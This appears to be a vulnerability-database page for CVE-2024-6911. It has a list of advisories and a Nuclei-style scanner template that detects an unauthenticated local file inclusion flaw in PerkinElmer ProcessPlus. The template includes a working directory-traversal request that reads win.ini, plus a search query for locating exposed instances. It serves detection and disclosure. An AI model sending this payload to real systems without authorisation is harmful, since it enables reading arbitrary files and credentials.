| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-6911 | 22 Jul 2024 23:41 | – | circl |
| CVE-2024-6911 | 22 Jul 2024 20:44 | – | cve |
| CVE-2024-6911 Unauthenticated Local File Inclusion | 22 Jul 2024 20:44 | – | cvelist |
| CVE-2024-6911 | 22 Jul 2024 21:15 | – | nvd |
| Generic HTTP Directory Traversal / File Inclusion (Web Application URL Parameter) - Active Check | 26 Sep 2017 00:00 | – | openvas |
| CVE-2024-6911 | 22 Jul 2024 21:15 | – | osv |
| Perten Instruments Process Plus Software 1.11.6507.0 LFI / Hardcoded Credentials | 23 Jul 2024 00:00 | – | packetstorm |
| PT-2024-37951 · Perkinelmer · Perkinelmer Processplus | 22 Jul 2024 00:00 | – | ptsecurity |
| CVE-2024-6911 | 23 May 2025 08:01 | – | redhatcve |
| CVE-2024-6911 Unauthenticated Local File Inclusion | 22 Jul 2024 20:44 | – | vulnrichment |

```yaml
id: CVE-2024-6911

info:
  name: PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion
  author: s4e-io
  severity: high
  description: |
    Files on the Windows system are accessible without authentication to external parties due to a local file inclusion in PerkinElmer ProcessPlus. This issue affects ProcessPlus through 1.11.6507.0.
  impact: |
    Unauthenticated attackers can exploit LFI to read arbitrary files from the Windows system, potentially exposing sensitive configuration files, credentials, and system information.
  remediation: |
    Update PerkinElmer ProcessPlus to a version later than 1.11.6507.0 to address the local file inclusion vulnerability.
  reference:
    - http://seclists.org/fulldisclosure/2024/Jul/13
    - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-perten-processplus/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6911
    - https://github.com/adminlove520/pocWiki
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
    cvss-score: 8.7
    cve-id: CVE-2024-6911
    cwe-id: CWE-552
    epss-score: 0.04944
    epss-percentile: 0.9109
    cpe: cpe:2.3:a:perkinelmer:processplus:1.11.6507:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: perkinelmer
    product: processplus
    fofa-query: '"Process Plus" && icon_hash="1772087922"'
  tags: cve,cve2024,processplus,intrusive,lfi,seclists,vuln

# Request 2 runs only if request 1 matched.
flow: http(1) && http(2)

http:
  # Request 1: fingerprint the product; the matcher is internal, so it gates the flow without being reported.
  - raw:
      - |
        GET /ProcessPlus HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"<title>Process Plus - Perten Instruments</title>")'
          - 'status_code == 200'
        condition: and
        internal: true

  # Request 2: confirm the file inclusion by checking the response for win.ini contents.
  - raw:
      - |
        GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"bit app support","fonts","extensions")'
          - 'contains(content_type, "text/plain")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220087599e26ddf245214ca6ad27b50fc2e9b77f8cbd3a3d99612c0c58593c72fc9022100d83718eedc7a24c898fee96a9b6e027af53ba2fddca98da7446c2274c3b33dc4:922c64590222798bb761d5b6d8e72950
```